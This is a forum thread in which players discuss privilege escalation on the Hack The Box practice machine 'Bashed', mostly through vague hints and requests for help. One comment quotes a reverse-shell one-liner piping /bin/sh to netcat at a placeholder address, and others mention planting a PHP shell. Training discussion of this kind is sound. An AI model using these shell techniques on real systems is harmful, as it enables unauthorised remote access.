Bashed

24

Comments

  • I have the best one: Enum and try harder.

  • So that was it, just a pair of bigger glasses to get root
  • @Saoirse said:
    It's like watching an AngryJoeShow video review :D

    I'd love to have access to a sub-forum for each box, password protected by the root flag, then we could discuss why certain things wouldn't work that under different circumstances would of, it's just a thought..

    This is an awesome idea!! Would love to see it implemented if possible!!

    andrewh

  • Surprised at how long it took to get root; mainly due to poor attention to detail.

    That said, it was not as straight forward as the ratings would suggest. Expect a number of distinct actions and pay close attention to the details of important files/directories.

    Enjoy!

    CISSP | OSCP | OSCE

  • i am using the basic priv esc cheat sheet from got milk. I still cant see the way to move from www-data to priv user. please any suggestion other than try harder will help! I have been enumerating for days and i just cat see the way.

    lordsoahc
    CCNP, CCNAx3

  • There is a way of reading the file you need... without being root

    Hack The Box

  • There's probably a better way though... really you should become root

    Hack The Box

  • It's been 2 days and still no luck with priv esc.
    Someone please drop a little hint besides enumeration

  • Ok i see the scripts directory. Have used the linenum.sh script. I have tried /bin/sh -i | nc x.x.x.x wich failed.dont seem to be a way to get python to spawn a shell. cant change /etc/profile as i am not root. Can u give a next hint to get out of jailed shell?

    lordsoahc
    CCNP, CCNAx3

  • pm Me

    lordsoahc
    CCNP, CCNAx3

  • ls "minus" l "slash" ..enough said

    deltaclock

  • Enough !
    I'm leaving this box.

  • Finally I'm very close to getting root !
    I just wanted to ask how did you guys execute the file before getting root cause i'm getting a permission denied message

  • @lordsoahc said:
    i am using the basic priv esc cheat sheet from got milk. I still cant see the way to move from www-data to priv user. please any suggestion other than try harder will help! I have been enumerating for days and i just cat see the way.

    Stuck in the same position.Tried "python" too. no clue how to proceed

    FloptimusCrime

  • I just got the flag for root, and this box drove me crazy!

    Magavolt

  • Guys, i'm very noob to hacking and even more in web hack, if someone could give me some tips I will appreciate XD.
    I already enumerate de directories, didn't find nothing interesting
    I try some way to put a php on site to create my way in bit nothing works.
    the only php on site have nothing inside and I couldn't exploit it

    Could you guys help me?

  • Same here. I don't know how to proceed after reading test.py. Anyone can give me a consistent hint (or even explain the next step) in PM?
    Trying is important to learn, getting stuck forever is only frustrating and I don't learn.
    Thanks in advance.

    halfluke

  • nevermind I got root

    halfluke

  • hi, i managed to get user.txt. currently, i have a php shell script in the tmp folder but trying to move it to the var folder to no avail. any help would be appreciated! thanks!

  • I keep struggling to get priv escalation from php since. Can anyone share a hint through PM
  • i also have stuck on priv esc. - runnning test.py it says 'permission denied. i tried bunch of sudo using scriptmanager or root - everytime it asks the password for current user. it is dead end. i saw somebody might used cron vector, but previous post siad what i even dont need rev shell to read root.txt. please, help because i couldn find another sudo options after lot of surfing the net which could work.

  • edited March 2018

    Spoiler Removed - Arrexel

    halfluke

  • edited March 2018

    @halfluke said:
    Spoiler Removed - Arrexel

    In fact you can see it but you have to be focus on time...

    1nitiative

  • you can actually see once you get a root shell

    halfluke

  • Hello, I am new here and I was looking for a bit of guidance, have run my enums and noticed some things, just wanted to know if I could pm someone and make sure im headed in the right direction. Thank you.

  • can anyone guide me to escalate privilege, tried with linuxprivchecker.py but still missing something. Thank you

  • Enumerate more. Maybe try another script to enumerate linux machines.

  • edited March 2018

    Spoiler Removed - Arrexel

  • Am I the only one not able to use the upload command????

  • @RedCup0x0 said:
    Am I the only one not able to use the upload command????

    there alternatives to upload command (hint: run some service on your local machine)

Sign In to comment.